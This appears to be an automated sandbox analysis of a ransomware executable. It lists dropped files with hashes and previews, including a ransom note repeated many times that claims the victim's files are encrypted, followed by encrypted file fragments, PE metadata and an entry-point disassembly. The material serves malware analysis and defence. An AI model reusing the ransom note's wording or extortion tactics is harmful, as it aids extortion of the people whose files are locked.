                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):472
                            Entropy (8bit):7.594563839726791
                            Encrypted:false
                            SSDEEP:12:ZzqV5uv2p2dskia0XiI0PN9DlGiL8acSjfuT2RQqKRPE:xqV5Hk3ia1IGlGiQacmsRPE
                            MD5:16652134F1402A8F4655C21A2441296B
                            SHA1:D70B180E4BDB5BC23BE943DB29C9D2E45ADAB43C
                            SHA-256:362481FC256AD5B3E73A8EEF3E8C218CD82BC02973CB036D0466831A8E809236
                            SHA-512:19BD63566A8FB320B1D4EB7ED5BF3857EC9882E66970D3A985D1FAA9B5C45A9227B44E24D07B776EEC13FD92E7EA23D4AEC452D1FC40FD0CA4E367F259CB47B9
                            Malicious:false
                            Preview:.w....k.z5...K..@.F.az"1[..R..7i&.K=...On.g.k.e...........%Q.E$..........:.S..M.W........I..].~..I.....O.0....@.....n..t.L..;.q,..f......33...#..I..q.mj.. ?....m@...C6.._...#..K.Hz%.l.>...j8......G...qH~P.,.?.[.(.........^.D......4....4............>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R........h......mPp..z...X.E._Q...).&........
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):472
                            Entropy (8bit):7.5372450178782895
                            Encrypted:false
                            SSDEEP:12:mhHD951kqjXKkL3H9SmU2XMg7iLBslGPN9DlGiL8acSjfuT2RQqRif:6DdXKkzBXduNzlGiQacm0
                            MD5:13B930C53CBFDAB56960FD2AB8BE8D9B
                            SHA1:03A0E95A87AD0AAF142ABFC68D27BD462EACE8B7
                            SHA-256:7C633DA691F13FF5A7BA7C4AE95DD1B196B6A88ECA2C533C9F2340AF0B3E842A
                            SHA-512:1B6486784C8FA6E5E346718A413505F1CA10D64E025DBC8F24D6B411DEAEAEA251D870EA2E4DF64AAEDF97821FEABFDB59DE3192BC6F92F70A7DCA4CE16E7D82
                            Malicious:false
                            Preview:fL..3\}A.(&t....*{.~Ji{.......6...EoF...0S"..../Y.\Ps....7.........U.x...Ne...pv.>Q.g....B.L0.:P....s-.)...F.....*.d.G9.......wl\.E.8.....3....q...I2e.IO.|.....e..~i..e.}.JgD.\..B..Y..Qj;....bD?}B..M...*..PI...m7~.[yD. T{\.m..S..3.n.`_^.............>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R...Z.......].~9.Z........I...+.g......_l......
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1083
                            Entropy (8bit):7.810947939935796
                            Encrypted:false
                            SSDEEP:24:7I2WdehgvWH466jsGg+Az69kJOZj2v9lGiQacmCm:4ehgvW36l9k0ZWlhQ6Z
                            MD5:FCAE89CB96EAFCB5EB04BD854AE51783
                            SHA1:E4B22DF4B8CE300B1C65A5F9C797EC33AF14BED1
                            SHA-256:FE0847F9E4968AA8CF8A2C9144A922F5F22D4C2062FBEF94403A591B166708AB
                            SHA-512:BED2AB16B5109D6C4D5D6E50157034273C59DB360DD33119BEB2BE5C565FFDDCA25FA4343B96E74597963E5CF9D9D55993FF2331240D6186727571F1BE0783B7
                            Malicious:false
                            Preview:M.1.6.....l.+t.7..-p`7&".....K!...%.KxA...}..JacX.......P......?)...LT..~..**.......7.M...F..IA...{Lz'p]...R.T)..lI.i...R9..j.......=.(.^D.A..N..].R.(...j.b.!...T..$*9s3..v.v.{..~..h{..<...J..:#.K.XE...{p..>&.0.D..;s.W.........[I}.......b..C._d4....d..@7.G.R..P2.............&....`.w...M.b.O..y.k....2........\.(#.v.....\A....}...$.,"G.}_.[...OM.............j.7...61#...Vm_..<r.......Z..... ..h4.'.s..~(..-.C].........<N...,.$IL...P1...........c\..aw...a.../..jT...j..h\"].z.._..E~.hDx6.=..f.v..s......ur...YL....02.HV..e...K...-.............k.D.'.x..i.a)..;'..NK*3b...D[.4.Ux.I.%&..#..N'!..vh..........s.E......I..OV=>'b..g.....7.^...y.0.I...A(85.z....p.&..L...~.D'.7.G..y....1R...U.!..M..3..H.V..:...J.V.N.$R>.B..R.4..>..*....f.E)......+.<...h)*...<W., zB.%......7).Fs.......=...C..|U..L.... .8.p.......\..........>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'..
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.232263954573744
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:RQzHm5vLxs.exe
                            File size:167'936 bytes
                            MD5:ca337c7130eef4f4ff8e8a4a8ec28647
                            SHA1:28558e35d3f9af01fe438eba7fba1c38201c86de
                            SHA256:17d153a225ea04a229862875795eeec0adb8c3e2769ba0e05073baaf86850467
                            SHA512:60b9b7841a942a6bcb700872b6ff1353fd282a7b318d6ac8d47e419573978aff43c961436a2fdb6a076e81545ef9759e7848fdc9eaa5a571638ab19d666a1c1c
                            SSDEEP:3072:LBVn11HzIOLbi4eTMlwDCnun4XbZIt+ypUF:d9jzvbnWJnu14p
                            TLSH:BEF3BF162D9001F3C9A742F1562B3FA7D2FEB978231915DF9350C8845E335D2BA2B62B
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............{i..{i..{i..%l..{i..%j..{i."%m..{i."%k..{i.Rich.{i.........................PE..L...ob.\.............................5.....
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x4035fd
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x5CF5626F [Mon Jun 3 18:09:51 2019 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:
                            Instruction
                            push 00000000h
                            call 00007FC900F06705h
                            push 00000000h
                            call 00007FC900F06F50h
                            pop ecx
                            ret
                            push ebp
                            mov ebp, esp
                            sub esp, 2Ch
                            lea eax, dword ptr [ebp-2Ch]
                            push esi
                            push eax
                            push 00000018h
                            pop esi
                            push esi
                            push dword ptr [ebp+08h]
                            call dword ptr [0041CB18h]
                            test eax, eax
                            je 00007FC900F068E6h
                            mov eax, dword ptr [ebp-1Ah]
                            imul eax, dword ptr [ebp-1Ch]
                            push ebx
                            push edi
                            xor edi, edi
                            inc edi
                            movzx eax, ax
                            cmp ax, di
                            jne 00007FC900F06756h
                            mov ebx, edi
